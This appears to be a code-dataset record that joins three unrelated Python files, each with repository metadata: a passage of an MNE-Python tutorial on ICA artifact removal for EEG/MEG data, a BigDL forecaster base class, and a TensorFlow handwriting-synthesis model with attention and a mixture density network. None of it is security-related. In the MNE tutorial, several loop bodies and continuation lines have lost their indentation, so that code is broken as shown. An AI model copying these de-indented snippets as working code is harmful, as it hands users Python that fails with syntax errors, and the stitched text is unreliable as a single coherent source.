# more information), so we'll keep a copy of the unfiltered
# `~mne.io.Raw` object around so we can apply the ICA solution to it
# later.
filt_raw = raw.copy().load_data().filter(l_freq=1., h_freq=None)
# %%
# Fitting and plotting the ICA solution
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# .. sidebar:: Ignoring the time domain
#
# The ICA algorithms implemented in MNE-Python find patterns across
# channels, but ignore the time domain. This means you can compute ICA on
# discontinuous `~mne.Epochs` or `~mne.Evoked` objects (not
# just continuous `~mne.io.Raw` objects), or only use every Nth
# sample by passing the ``decim`` parameter to ``ICA.fit()``.
#
# .. note:: `~mne.Epochs` used for fitting ICA should not be
# baseline-corrected. Because cleaning the data via ICA may
#           introduce DC offsets, we suggest baseline correcting your data
# **after** cleaning (and not before), should you require
# baseline correction.
#
# Now we're ready to set up and fit the ICA. Since we know (from observing our
# raw data) that the EOG and ECG artifacts are fairly strong, we would expect
# those artifacts to be captured in the first few dimensions of the PCA
# decomposition that happens before the ICA. Therefore, we probably don't need
# a huge number of components to do a good job of isolating our artifacts
# (though it is usually preferable to include more components for a more
# accurate solution). As a first guess, we'll run ICA with ``n_components=15``
# (use only the first 15 PCA components to compute the ICA decomposition) — a
# very small number given that our data has over 300 channels, but with the
# advantage that it will run quickly and we will be able to tell easily whether it
# worked or not (because we already know what the EOG / ECG artifacts should
# look like).
#
# ICA fitting is not deterministic (e.g., the components may get a sign
# flip on different runs, or may not always be returned in the same order), so
# we'll also specify a `random seed`_ so that we get identical results each
# time this tutorial is built by our web servers.
ica = ICA(n_components=15, max_iter='auto', random_state=97)
ica.fit(filt_raw)
ica
# %%
# Some optional parameters that we could have passed to the
# `~mne.preprocessing.ICA.fit` method include ``decim`` (to use only
# every Nth sample in computing the ICs, which can yield a considerable
# speed-up) and ``reject`` (for providing a rejection dictionary for maximum
# acceptable peak-to-peak amplitudes for each channel type, just like we used
# when creating epoched data in the :ref:`tut-overview` tutorial).
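#
# As a brief sketch of such a call (the parameter values here mirror the
# rejection thresholds used later in this tutorial and are illustrative, not
# tuned):

ica_fast = ICA(n_components=15, max_iter='auto', random_state=97)
ica_fast.fit(filt_raw, decim=3, reject=dict(grad=4000e-13, mag=4e-12))
del ica_fast

# %%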
#
# Now we can examine the ICs to see what they captured.
# `~mne.preprocessing.ICA.plot_sources` will show the time series of the
# ICs. Note that in our call to `~mne.preprocessing.ICA.plot_sources` we
# can use the original, unfiltered `~mne.io.Raw` object:
raw.load_data()
ica.plot_sources(raw, show_scrollbars=False)
# %%
# Here we can pretty clearly see that the first component (``ICA000``) captures
# the EOG signal quite well, and the second component (``ICA001``) looks a lot
# like `a heartbeat <qrs_>`_ (for more info on visually identifying Independent
# Components, `this EEGLAB tutorial`_ is a good resource). We can also
# visualize the scalp field distribution of each component using
# `~mne.preprocessing.ICA.plot_components`. These are interpolated based
# on the values in the ICA mixing matrix:
# sphinx_gallery_thumbnail_number = 9
ica.plot_components()
# %%
# .. note::
#
# `~mne.preprocessing.ICA.plot_components` (which plots the scalp
# field topographies for each component) has an optional ``inst`` parameter
# that takes an instance of `~mne.io.Raw` or `~mne.Epochs`.
# Passing ``inst`` makes the scalp topographies interactive: clicking one
# will bring up a diagnostic `~mne.preprocessing.ICA.plot_properties`
# window (see below) for that component.
#
# In the plots above it's fairly obvious which ICs are capturing our EOG and
# ECG artifacts, but there are additional ways to visualize them, just to
# be sure. First, we can plot an overlay of the original signal against the
# reconstructed signal with the artifactual ICs excluded, using
# `~mne.preprocessing.ICA.plot_overlay`:
# blinks
ica.plot_overlay(raw, exclude=[0], picks='eeg')
# heartbeats
ica.plot_overlay(raw, exclude=[1], picks='mag')
# %%
# We can also plot some diagnostics of each IC using
# `~mne.preprocessing.ICA.plot_properties`:
ica.plot_properties(raw, picks=[0, 1])
# %%
# In the remaining sections, we'll look at different ways of choosing which ICs
# to exclude prior to reconstructing the sensor signals.
#
#
# Selecting ICA components manually
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Once we're certain which components we want to exclude, we can specify that
# manually by setting the ``ica.exclude`` attribute. Similar to marking bad
# channels, merely setting ``ica.exclude`` doesn't do anything immediately (it
# just adds the excluded ICs to a list that will get used later when it's
# needed). Once the exclusions have been set, ICA methods like
# `~mne.preprocessing.ICA.plot_overlay` will exclude those component(s)
# even if no ``exclude`` parameter is passed, and the list of excluded
# components will be preserved when using `mne.preprocessing.ICA.save`
# and `mne.preprocessing.read_ica`.
ica.exclude = [0, 1] # indices chosen based on various plots above
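# a quick sketch (the file name is illustrative): the exclusions survive a
# save/load round-trip
ica.save('example-ica.fif')
print(mne.preprocessing.read_ica('example-ica.fif').exclude)  # -> [0, 1]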
# %%
# Now that the exclusions have been set, we can reconstruct the sensor signals
# with artifacts removed using the `~mne.preprocessing.ICA.apply` method
# (remember, we're applying the ICA solution from the *filtered* data to the
# original *unfiltered* signal). Plotting the original raw data alongside the
# reconstructed data shows that the heartbeat and blink artifacts are repaired.
# ica.apply() changes the Raw object in-place, so let's make a copy first:
reconst_raw = raw.copy()
ica.apply(reconst_raw)
raw.plot(order=artifact_picks, n_channels=len(artifact_picks),
show_scrollbars=False)
reconst_raw.plot(order=artifact_picks, n_channels=len(artifact_picks),
show_scrollbars=False)
del reconst_raw
# %%
# Using an EOG channel to select ICA components
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# It may have seemed easy to review the plots and manually select which ICs to
# exclude, but when processing dozens or hundreds of subjects this can become
# a tedious, rate-limiting step in the analysis pipeline. One alternative is to
# use dedicated EOG or ECG sensors as a "pattern" to check the ICs against, and
# automatically mark for exclusion any ICs that match the EOG/ECG pattern. Here
# we'll use `~mne.preprocessing.ICA.find_bads_eog` to automatically find
# the ICs that best match the EOG signal, then use
# `~mne.preprocessing.ICA.plot_scores` along with our other plotting
# functions to see which ICs it picked. We'll start by resetting
# ``ica.exclude`` back to an empty list:
ica.exclude = []
# find which ICs match the EOG pattern
eog_indices, eog_scores = ica.find_bads_eog(raw)
ica.exclude = eog_indices
# barplot of ICA component "EOG match" scores
ica.plot_scores(eog_scores)
# plot diagnostics
ica.plot_properties(raw, picks=eog_indices)
# plot ICs applied to raw data, with EOG matches highlighted
ica.plot_sources(raw, show_scrollbars=False)
# plot ICs applied to the averaged EOG epochs, with EOG matches highlighted
ica.plot_sources(eog_evoked)
# %%
# Note that above we used `~mne.preprocessing.ICA.plot_sources` on both
# the original `~mne.io.Raw` instance and also on an
# `~mne.Evoked` instance of the extracted EOG artifacts. This can be
# another way to confirm that `~mne.preprocessing.ICA.find_bads_eog` has
# identified the correct components.
#
#
# Using a simulated channel to select ICA components
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# If you don't have a dedicated EOG channel,
# `~mne.preprocessing.ICA.find_bads_eog` has a ``ch_name`` parameter that lets
# you designate another channel as a proxy for EOG. You can use a single
# channel, or create a bipolar reference from frontal EEG sensors and use that
# as a virtual EOG channel. This carries a risk, however: you must hope that
# the frontal EEG channels only reflect EOG and not brain dynamics in the
# prefrontal cortex (or you must not care about those prefrontal signals).
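#
# A hedged sketch of that approach (the channel names assume a montage with
# ``Fp1``/``Fp2``, which this sample dataset does not have, so the function is
# illustrative only):

def find_bads_via_virtual_eog(ica, raw, anode='Fp1', cathode='Fp2'):
    """Use a bipolar frontal derivation as a proxy EOG channel."""
    raw_bip = mne.set_bipolar_reference(raw, anode=anode, cathode=cathode,
                                        copy=True)
    return ica.find_bads_eog(raw_bip, ch_name='{}-{}'.format(anode, cathode))

# %%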
#
# For ECG, it is easier: `~mne.preprocessing.ICA.find_bads_ecg` can use
# cross-channel averaging of magnetometer or gradiometer channels to construct
# a virtual ECG channel, so if you have MEG channels it is usually not
# necessary to pass a specific channel name.
# `~mne.preprocessing.ICA.find_bads_ecg` also has two options for its
# ``method`` parameter: ``'ctps'`` (cross-trial phase statistics
# :footcite:`DammersEtAl2008`) and
# ``'correlation'`` (Pearson correlation between data and ECG channel).
ica.exclude = []
# find which ICs match the ECG pattern
ecg_indices, ecg_scores = ica.find_bads_ecg(raw, method='correlation',
threshold='auto')
ica.exclude = ecg_indices
# barplot of ICA component "ECG match" scores
ica.plot_scores(ecg_scores)
# plot diagnostics
ica.plot_properties(raw, picks=ecg_indices)
# plot ICs applied to raw data, with ECG matches highlighted
ica.plot_sources(raw, show_scrollbars=False)
# plot ICs applied to the averaged ECG epochs, with ECG matches highlighted
ica.plot_sources(ecg_evoked)
# %%
# The last of these plots is especially useful: it shows us that the heartbeat
# artifact is coming through on *two* ICs, and we've only caught one of them.
# In fact, if we look closely at the output of
# `~mne.preprocessing.ICA.plot_sources` (online, you can right-click →
# "view image" to zoom in), it looks like ``ICA014`` has a weak periodic
# component that is in-phase with ``ICA001``. It might be worthwhile to re-run
# the ICA with more components to see if that second heartbeat artifact
# resolves out a little better:
# refit the ICA with 30 components this time
new_ica = ICA(n_components=30, max_iter='auto', random_state=97)
new_ica.fit(filt_raw)
# find which ICs match the ECG pattern
ecg_indices, ecg_scores = new_ica.find_bads_ecg(raw, method='correlation',
threshold='auto')
new_ica.exclude = ecg_indices
# barplot of ICA component "ECG match" scores
new_ica.plot_scores(ecg_scores)
# plot diagnostics
new_ica.plot_properties(raw, picks=ecg_indices)
# plot ICs applied to raw data, with ECG matches highlighted
new_ica.plot_sources(raw, show_scrollbars=False)
# plot ICs applied to the averaged ECG epochs, with ECG matches highlighted
new_ica.plot_sources(ecg_evoked)
# %%
# Much better! Now we've captured both ICs that are reflecting the heartbeat
# artifact (and as a result, we got two diagnostic plots: one for each IC that
# reflects the heartbeat). This demonstrates the value of checking the results
# of automated approaches like `~mne.preprocessing.ICA.find_bads_ecg`
# before accepting them.
# clean up memory before moving on
del raw, ica, new_ica
# %%
# Selecting ICA components using template matching
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# When dealing with multiple subjects, it is also possible to manually select
# an IC for exclusion on one subject, and then use that component as a
# *template* for selecting which ICs to exclude from other subjects' data,
# using `mne.preprocessing.corrmap` :footcite:`CamposViolaEtAl2009`.
# The idea behind `~mne.preprocessing.corrmap` is that the artifact patterns
# are similar
# enough across subjects that corresponding ICs can be identified by
# correlating the ICs from each ICA solution with a common template, and
# picking the ICs with the highest correlation strength.
# `~mne.preprocessing.corrmap` takes a list of ICA solutions, and a
# ``template`` parameter that specifies which ICA object and which component
# within it to use as a template.
#
# Since our sample dataset only contains data from one subject, we'll use a
# different dataset with multiple subjects: the EEGBCI dataset
# :footcite:`SchalkEtAl2004,GoldbergerEtAl2000`. The
# dataset has 109 subjects; we'll download just one run (a left/right hand
# movement task) from each of the first 4 subjects:
mapping = {
'Fc5.': 'FC5', 'Fc3.': 'FC3', 'Fc1.': 'FC1', 'Fcz.': 'FCz', 'Fc2.': 'FC2',
'Fc4.': 'FC4', 'Fc6.': 'FC6', 'C5..': 'C5', 'C3..': 'C3', 'C1..': 'C1',
'Cz..': 'Cz', 'C2..': 'C2', 'C4..': 'C4', 'C6..': 'C6', 'Cp5.': 'CP5',
'Cp3.': 'CP3', 'Cp1.': 'CP1', 'Cpz.': 'CPz', 'Cp2.': 'CP2', 'Cp4.': 'CP4',
'Cp6.': 'CP6', 'Fp1.': 'Fp1', 'Fpz.': 'Fpz', 'Fp2.': 'Fp2', 'Af7.': 'AF7',
'Af3.': 'AF3', 'Afz.': 'AFz', 'Af4.': 'AF4', 'Af8.': 'AF8', 'F7..': 'F7',
'F5..': 'F5', 'F3..': 'F3', 'F1..': 'F1', 'Fz..': 'Fz', 'F2..': 'F2',
'F4..': 'F4', 'F6..': 'F6', 'F8..': 'F8', 'Ft7.': 'FT7', 'Ft8.': 'FT8',
'T7..': 'T7', 'T8..': 'T8', 'T9..': 'T9', 'T10.': 'T10', 'Tp7.': 'TP7',
'Tp8.': 'TP8', 'P7..': 'P7', 'P5..': 'P5', 'P3..': 'P3', 'P1..': 'P1',
'Pz..': 'Pz', 'P2..': 'P2', 'P4..': 'P4', 'P6..': 'P6', 'P8..': 'P8',
'Po7.': 'PO7', 'Po3.': 'PO3', 'Poz.': 'POz', 'Po4.': 'PO4', 'Po8.': 'PO8',
'O1..': 'O1', 'Oz..': 'Oz', 'O2..': 'O2', 'Iz..': 'Iz'
}
raws = list()
icas = list()
for subj in range(4):
# EEGBCI subjects are 1-indexed; run 3 is a left/right hand movement task
fname = mne.datasets.eegbci.load_data(subj + 1, runs=[3])[0]
raw = mne.io.read_raw_edf(fname)
# remove trailing `.` from channel names so we can set montage
raw.rename_channels(mapping)
raw.set_montage('standard_1005')
# high-pass filter
raw_filt = raw.copy().load_data().filter(l_freq=1., h_freq=None)
# fit ICA
ica = ICA(n_components=30, max_iter='auto', random_state=97)
ica.fit(raw_filt)
raws.append(raw)
icas.append(ica)
# %%
# Now let's run `~mne.preprocessing.corrmap`:
# use the first subject as template; use Fpz as proxy for EOG
raw = raws[0]
ica = icas[0]
eog_inds, eog_scores = ica.find_bads_eog(raw, ch_name='Fpz')
corrmap(icas, template=(0, eog_inds[0]))
# %%
# The first figure shows the template map, while the second figure shows all
# the maps that were considered a "match" for the template (including the
# template itself). There is one match for each subject, but it's a good idea
# to also double-check the ICA sources for each subject:
for index, (ica, raw) in enumerate(zip(icas, raws)):
fig = ica.plot_sources(raw, show_scrollbars=False)
fig.subplots_adjust(top=0.9) # make space for title
fig.suptitle('Subject {}'.format(index))
# %%
# Notice that subjects 2 and 3 each seem to have *two* ICs that reflect ocular
# activity (components ``ICA000`` and ``ICA002``), but only one was caught by
# `~mne.preprocessing.corrmap`. Let's try setting the threshold manually:
corrmap(icas, template=(0, eog_inds[0]), threshold=0.9)
# %%
# This time it found 2 ICs for each of subjects 2 and 3 (which is good).
# At this point we'll re-run `~mne.preprocessing.corrmap` with
# parameters ``label='blink', plot=False`` to *label* the ICs from each subject
# that capture the blink artifacts (without plotting them again).
corrmap(icas, template=(0, eog_inds[0]), threshold=0.9, label='blink',
plot=False)
print([ica.labels_ for ica in icas])
# %%
# Notice that the first subject has 3 different labels for the IC at index 0:
# "eog/0/Fpz", "eog", and "blink". The first two were added by
# `~mne.preprocessing.ICA.find_bads_eog`; the "blink" label was added by the
# last call to `~mne.preprocessing.corrmap`. Notice also that each subject has
# at least one IC index labelled "blink", and subjects 2 and 3 each have two
# components (0 and 2) labelled "blink" (consistent with the plot of IC sources
# above). The ``labels_`` attribute of `~mne.preprocessing.ICA` objects can
# also be manually edited to annotate the ICs with custom labels. They also
# come in handy when plotting:
icas[3].plot_components(picks=icas[3].labels_['blink'])
icas[3].exclude = icas[3].labels_['blink']
icas[3].plot_sources(raws[3], show_scrollbars=False)
# %%
# As a final note, it is possible to extract ICs numerically using the
# `~mne.preprocessing.ICA.get_components` method of
# `~mne.preprocessing.ICA` objects. This will return a :class:`NumPy
# array <numpy.ndarray>` that can be passed to
# `~mne.preprocessing.corrmap` instead of the :class:`tuple` of
# ``(subject_index, component_index)`` we passed before, and will yield the
# same result:
template_eog_component = icas[0].get_components()[:, eog_inds[0]]
corrmap(icas, template=template_eog_component, threshold=0.9)
print(template_eog_component)
# %%
# An advantage of using this numerical representation of an IC to capture a
# particular artifact pattern is that it can be saved and used as a template
# for future template-matching tasks using `~mne.preprocessing.corrmap`
# without having to load or recompute the ICA solution that yielded the
# template originally. Put another way, when the template is a NumPy array, the
# `~mne.preprocessing.ICA` object containing the template does not need
# to be in the list of ICAs provided to `~mne.preprocessing.corrmap`.
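#
# For example (a minimal sketch), the template array can be stored on disk and
# reloaded in a later session without refitting any ICA:

import numpy as np
np.save('template_eog_component.npy', template_eog_component)
template_eog_component = np.load('template_eog_component.npy')

# %%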
#
# .. LINKS
#
# .. _`blind source separation`:
# https://en.wikipedia.org/wiki/Signal_separation
# .. _`statistically independent`:
# https://en.wikipedia.org/wiki/Independence_(probability_theory)
# .. _`scikit-learn`: https://scikit-learn.org
# .. _`random seed`: https://en.wikipedia.org/wiki/Random_seed
# .. _`regular expression`: https://www.regular-expressions.info/
# .. _`qrs`: https://en.wikipedia.org/wiki/QRS_complex
# .. _`this EEGLAB tutorial`: https://labeling.ucsd.edu/tutorial/labels
# %%
# Compute ICA components on Epochs
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# ICA is now fit to epoched MEG data instead of the raw data.
# We assume that the non-stationary EOG artifacts have already been removed.
# The sources matching the ECG are automatically found and displayed.
#
# .. note::
# This example is computationally intensive, so it might take a few minutes
# to complete.
#
# After reading the data, preprocessing consists of:
#
# - MEG channel selection
# - 1-30 Hz band-pass filter
# - epoching -0.2 to 0.5 seconds with respect to events
# - rejection based on peak-to-peak amplitude
#
# Note that we don't baseline-correct the epochs here; we'll do this after
# the ICA cleaning is complete. Baseline correction before ICA is not
# recommended by the MNE-Python developers, as it doesn't guarantee optimal
# results.
filt_raw.pick_types(meg=True, eeg=False, exclude='bads', stim=True).load_data()
filt_raw.filter(1, 30, fir_design='firwin')
# peak-to-peak amplitude rejection parameters
reject = dict(grad=4000e-13, mag=4e-12)
# create longer and more epochs for greater artifact exposure
events = mne.find_events(filt_raw, stim_channel='STI 014')
# don't baseline correct epochs
epochs = mne.Epochs(filt_raw, events, event_id=None, tmin=-0.2, tmax=0.5,
reject=reject, baseline=None)
# %%
# Fit ICA model using the FastICA algorithm, detect and plot components
# explaining ECG artifacts.
ica = ICA(n_components=15, method='fastica', max_iter="auto").fit(epochs)
ecg_epochs = create_ecg_epochs(filt_raw, tmin=-.5, tmax=.5)
ecg_inds, scores = ica.find_bads_ecg(ecg_epochs, threshold='auto')
ica.plot_components(ecg_inds)
# %%
# Plot the properties of the ECG components:
ica.plot_properties(epochs, picks=ecg_inds)
# %%
# Plot the estimated sources of detected ECG related components:
ica.plot_sources(filt_raw, picks=ecg_inds)
# %%
# References
# ^^^^^^^^^^
# .. footbibliography::
|
bloyl/mne-python
|
tutorials/preprocessing/40_artifact_correction_ica.py
|
Python
|
bsd-3-clause
| 29,351
|
[
"Gaussian"
] |
b0c26ec8fe42b2d8880eaa7c64a2cfb7decfee5b8148b231257ba94e61dfaedd
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod
from bigdl.orca.tfpark import KerasModel as TFParkKerasModel
import tensorflow as tf
from bigdl.chronos.forecaster.abstract import Forecaster
class TFParkForecaster(TFParkKerasModel, Forecaster, metaclass=ABCMeta):
"""
    Base class for TFPark KerasModel-based forecast models.
"""
def __init__(self):
"""
        Initialize the forecaster.
        Turns the tf.keras model returned from _build into a tfpark.KerasModel.
"""
self.model = self._build()
assert (isinstance(self.model, tf.keras.Model))
super().__init__(self.model)
@abstractmethod
def _build(self):
"""
Build a tf.keras model.
:return: a tf.keras model (compiled)
"""
pass
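# A minimal, hypothetical subclass sketch (illustrative only, not part of
# BigDL) showing how a concrete forecaster implements ``_build``:
class _ExampleForecaster(TFParkForecaster):
    """Toy forecaster mapping a flat 10-feature vector to one output."""
    def _build(self):
        # build and compile a tf.keras model, as the base class requires
        model = tf.keras.Sequential([
            tf.keras.layers.Dense(8, activation='relu', input_shape=(10,)),
            tf.keras.layers.Dense(1),
        ])
        model.compile(optimizer='adam', loss='mse')
        return model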
|
intel-analytics/BigDL
|
python/chronos/src/bigdl/chronos/forecaster/tfpark_forecaster.py
|
Python
|
apache-2.0
| 1,366
|
[
"ORCA"
] |
9fc21a0c0eadaf2c49bf1d0954cb2610e14c82117afedea2b09e47b4a12807d5
|
import numpy as np
import numpy.matlib
import math
import random
import os
import xml.etree.ElementTree as ET
import tensorflow as tf
from utils import *
class Model():
def __init__(self, args, logger):
self.logger = logger
# ----- transfer some of the args params over to the model
# model params
self.rnn_size = args.rnn_size
self.train = args.train
self.nmixtures = args.nmixtures
self.kmixtures = args.kmixtures
self.batch_size = args.batch_size if self.train else 1 # training/sampling specific
self.tsteps = args.tsteps if self.train else 1 # training/sampling specific
self.alphabet = args.alphabet
# training params
self.dropout = args.dropout
self.grad_clip = args.grad_clip
# misc
self.tsteps_per_ascii = args.tsteps_per_ascii
self.data_dir = args.data_dir
self.graves_initializer = tf.truncated_normal_initializer(mean=0., stddev=.075, seed=None, dtype=tf.float32)
self.window_b_initializer = tf.truncated_normal_initializer(mean=-3.0, stddev=.25, seed=None, dtype=tf.float32) # hacky initialization
        self.logger.write('\tusing alphabet {}'.format(self.alphabet))
        self.char_vec_len = len(self.alphabet) + 1  # plus one for <UNK> token
        # integer division so ascii_steps can be used as a tensor dimension
        self.ascii_steps = args.tsteps // args.tsteps_per_ascii
# ----- build the basic recurrent network architecture
cell_func = tf.contrib.rnn.LSTMCell # could be GRUCell or RNNCell
self.cell0 = cell_func(args.rnn_size, state_is_tuple=True, initializer=self.graves_initializer)
self.cell1 = cell_func(args.rnn_size, state_is_tuple=True, initializer=self.graves_initializer)
self.cell2 = cell_func(args.rnn_size, state_is_tuple=True, initializer=self.graves_initializer)
if (self.train and self.dropout < 1): # training mode
self.cell0 = tf.contrib.rnn.DropoutWrapper(self.cell0, output_keep_prob = self.dropout)
self.cell1 = tf.contrib.rnn.DropoutWrapper(self.cell1, output_keep_prob = self.dropout)
self.cell2 = tf.contrib.rnn.DropoutWrapper(self.cell2, output_keep_prob = self.dropout)
self.input_data = tf.placeholder(dtype=tf.float32, shape=[None, self.tsteps, 3])
self.target_data = tf.placeholder(dtype=tf.float32, shape=[None, self.tsteps, 3])
self.istate_cell0 = self.cell0.zero_state(batch_size=self.batch_size, dtype=tf.float32)
self.istate_cell1 = self.cell1.zero_state(batch_size=self.batch_size, dtype=tf.float32)
self.istate_cell2 = self.cell2.zero_state(batch_size=self.batch_size, dtype=tf.float32)
#slice the input volume into separate vols for each tstep
inputs = [tf.squeeze(input_, [1]) for input_ in tf.split(self.input_data, self.tsteps, 1)]
#build cell0 computational graph
outs_cell0, self.fstate_cell0 = tf.contrib.legacy_seq2seq.rnn_decoder(inputs, self.istate_cell0, self.cell0, loop_function=None, scope='cell0')
# ----- build the gaussian character window
def get_window(alpha, beta, kappa, c):
# phi -> [? x 1 x ascii_steps] and is a tf matrix
# c -> [? x ascii_steps x alphabet] and is a tf matrix
ascii_steps = c.get_shape()[1].value #number of items in sequence
phi = get_phi(ascii_steps, alpha, beta, kappa)
window = tf.matmul(phi,c)
window = tf.squeeze(window, [1]) # window ~ [?,alphabet]
return window, phi
#get phi for all t,u (returns a [1 x tsteps] matrix) that defines the window
def get_phi(ascii_steps, alpha, beta, kappa):
# alpha, beta, kappa -> [?,kmixtures,1] and each is a tf variable
u = np.linspace(0,ascii_steps-1,ascii_steps) # weight all the U items in the sequence
kappa_term = tf.square( tf.subtract(kappa,u))
exp_term = tf.multiply(-beta,kappa_term)
phi_k = tf.multiply(alpha, tf.exp(exp_term))
phi = tf.reduce_sum(phi_k,1, keep_dims=True)
return phi # phi ~ [?,1,ascii_steps]
def get_window_params(i, out_cell0, kmixtures, prev_kappa, reuse=True):
hidden = out_cell0.get_shape()[1]
n_out = 3*kmixtures
with tf.variable_scope('window',reuse=reuse):
window_w = tf.get_variable("window_w", [hidden, n_out], initializer=self.graves_initializer)
window_b = tf.get_variable("window_b", [n_out], initializer=self.window_b_initializer)
abk_hats = tf.nn.xw_plus_b(out_cell0, window_w, window_b) # abk_hats ~ [?,n_out]
abk = tf.exp(tf.reshape(abk_hats, [-1, 3*kmixtures,1])) # abk_hats ~ [?,n_out] = "alpha, beta, kappa hats"
alpha, beta, kappa = tf.split(abk, 3, 1) # alpha_hat, etc ~ [?,kmixtures]
kappa = kappa + prev_kappa
return alpha, beta, kappa # each ~ [?,kmixtures,1]
self.init_kappa = tf.placeholder(dtype=tf.float32, shape=[None, self.kmixtures, 1])
self.char_seq = tf.placeholder(dtype=tf.float32, shape=[None, self.ascii_steps, self.char_vec_len])
prev_kappa = self.init_kappa
prev_window = self.char_seq[:,0,:]
#add gaussian window result
reuse = False
for i in range(len(outs_cell0)):
[alpha, beta, new_kappa] = get_window_params(i, outs_cell0[i], self.kmixtures, prev_kappa, reuse=reuse)
window, phi = get_window(alpha, beta, new_kappa, self.char_seq)
outs_cell0[i] = tf.concat((outs_cell0[i],window), 1) #concat outputs
outs_cell0[i] = tf.concat((outs_cell0[i],inputs[i]), 1) #concat input data
prev_kappa = new_kappa
prev_window = window
reuse = True
#save some attention mechanism params (useful for sampling/debugging later)
self.window = window
self.phi = phi
self.new_kappa = new_kappa
self.alpha = alpha
# ----- finish building LSTMs 2 and 3
outs_cell1, self.fstate_cell1 = tf.contrib.legacy_seq2seq.rnn_decoder(outs_cell0, self.istate_cell1, self.cell1, loop_function=None, scope='cell1')
outs_cell2, self.fstate_cell2 = tf.contrib.legacy_seq2seq.rnn_decoder(outs_cell1, self.istate_cell2, self.cell2, loop_function=None, scope='cell2')
# ----- start building the `Mixture Density Network `on top (start with a dense layer to predict the MDN params)
n_out = 1 + self.nmixtures * 6 # params = end_of_stroke + 6 parameters per Gaussian
with tf.variable_scope('mdn_dense'):
mdn_w = tf.get_variable("output_w", [self.rnn_size, n_out], initializer=self.graves_initializer)
mdn_b = tf.get_variable("output_b", [n_out], initializer=self.graves_initializer)
out_cell2 = tf.reshape(tf.concat(outs_cell2, 1), [-1, args.rnn_size]) #concat outputs for efficiency
output = tf.nn.xw_plus_b(out_cell2, mdn_w, mdn_b) #data flows through dense nn
# ----- build mixture density cap on top of second recurrent cell
def gaussian2d(x1, x2, mu1, mu2, s1, s2, rho):
# define gaussian mdn (eq 24, 25 from http://arxiv.org/abs/1308.0850)
x_mu1 = tf.subtract(x1, mu1)
x_mu2 = tf.subtract(x2, mu2)
Z = tf.square(tf.div(x_mu1, s1)) + \
tf.square(tf.div(x_mu2, s2)) - \
2*tf.div(tf.multiply(rho, tf.multiply(x_mu1, x_mu2)), tf.multiply(s1, s2))
rho_square_term = 1-tf.square(rho)
power_e = tf.exp(tf.div(-Z,2*rho_square_term))
regularize_term = 2*np.pi*tf.multiply(tf.multiply(s1, s2), tf.sqrt(rho_square_term))
gaussian = tf.div(power_e, regularize_term)
return gaussian
def get_loss(pi, x1_data, x2_data, eos_data, mu1, mu2, sigma1, sigma2, rho, eos):
# define loss function (eq 26 of http://arxiv.org/abs/1308.0850)
gaussian = gaussian2d(x1_data, x2_data, mu1, mu2, sigma1, sigma2, rho)
term1 = tf.multiply(gaussian, pi)
term1 = tf.reduce_sum(term1, 1, keep_dims=True) #do inner summation
            term1 = -tf.log(tf.maximum(term1, 1e-20))  # clamp to avoid log(0) -> numerical errors
term2 = tf.multiply(eos, eos_data) + tf.multiply(1-eos, 1-eos_data) #modified Bernoulli -> eos probability
term2 = -tf.log(term2) #negative log error gives loss
return tf.reduce_sum(term1 + term2) #do outer summation
# now transform dense NN outputs into params for MDN
def get_mdn_coef(Z):
# returns the tf slices containing mdn dist params (eq 18...23 of http://arxiv.org/abs/1308.0850)
eos_hat = Z[:, 0:1] #end of sentence tokens
pi_hat, mu1_hat, mu2_hat, sigma1_hat, sigma2_hat, rho_hat = tf.split(Z[:, 1:], 6, 1)
self.pi_hat, self.sigma1_hat, self.sigma2_hat = \
pi_hat, sigma1_hat, sigma2_hat # these are useful for bias method during sampling
eos = tf.sigmoid(-1*eos_hat) # technically we gained a negative sign
pi = tf.nn.softmax(pi_hat) # softmax z_pi:
mu1 = mu1_hat; mu2 = mu2_hat # leave mu1, mu2 as they are
sigma1 = tf.exp(sigma1_hat); sigma2 = tf.exp(sigma2_hat) # exp for sigmas
            rho = tf.tanh(rho_hat)  # tanh for rho (squish between -1 and 1)
return [eos, pi, mu1, mu2, sigma1, sigma2, rho]
# reshape target data (as we did the input data)
flat_target_data = tf.reshape(self.target_data,[-1, 3])
[x1_data, x2_data, eos_data] = tf.split(flat_target_data, 3, 1) #we might as well split these now
[self.eos, self.pi, self.mu1, self.mu2, self.sigma1, self.sigma2, self.rho] = get_mdn_coef(output)
loss = get_loss(self.pi, x1_data, x2_data, eos_data, self.mu1, self.mu2, self.sigma1, self.sigma2, self.rho, self.eos)
self.cost = loss / (self.batch_size * self.tsteps)
# ----- bring together all variables and prepare for training
self.learning_rate = tf.Variable(0.0, trainable=False)
self.decay = tf.Variable(0.0, trainable=False)
self.momentum = tf.Variable(0.0, trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars), self.grad_clip)
if args.optimizer == 'adam':
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
elif args.optimizer == 'rmsprop':
self.optimizer = tf.train.RMSPropOptimizer(learning_rate=self.learning_rate, decay=self.decay, momentum=self.momentum)
else:
raise ValueError("Optimizer type not recognized")
self.train_op = self.optimizer.apply_gradients(zip(grads, tvars))
# ----- some TensorFlow I/O
self.sess = tf.InteractiveSession()
self.saver = tf.train.Saver(tf.global_variables())
self.sess.run(tf.global_variables_initializer())
# ----- for restoring previous models
def try_load_model(self, save_path):
load_was_success = True # yes, I'm being optimistic
global_step = 0
try:
save_dir = '/'.join(save_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(save_dir)
load_path = ckpt.model_checkpoint_path
self.saver.restore(self.sess, load_path)
        except Exception:  # no checkpoint found or restore failed
self.logger.write("no saved model to load. starting new session")
load_was_success = False
else:
self.logger.write("loaded model: {}".format(load_path))
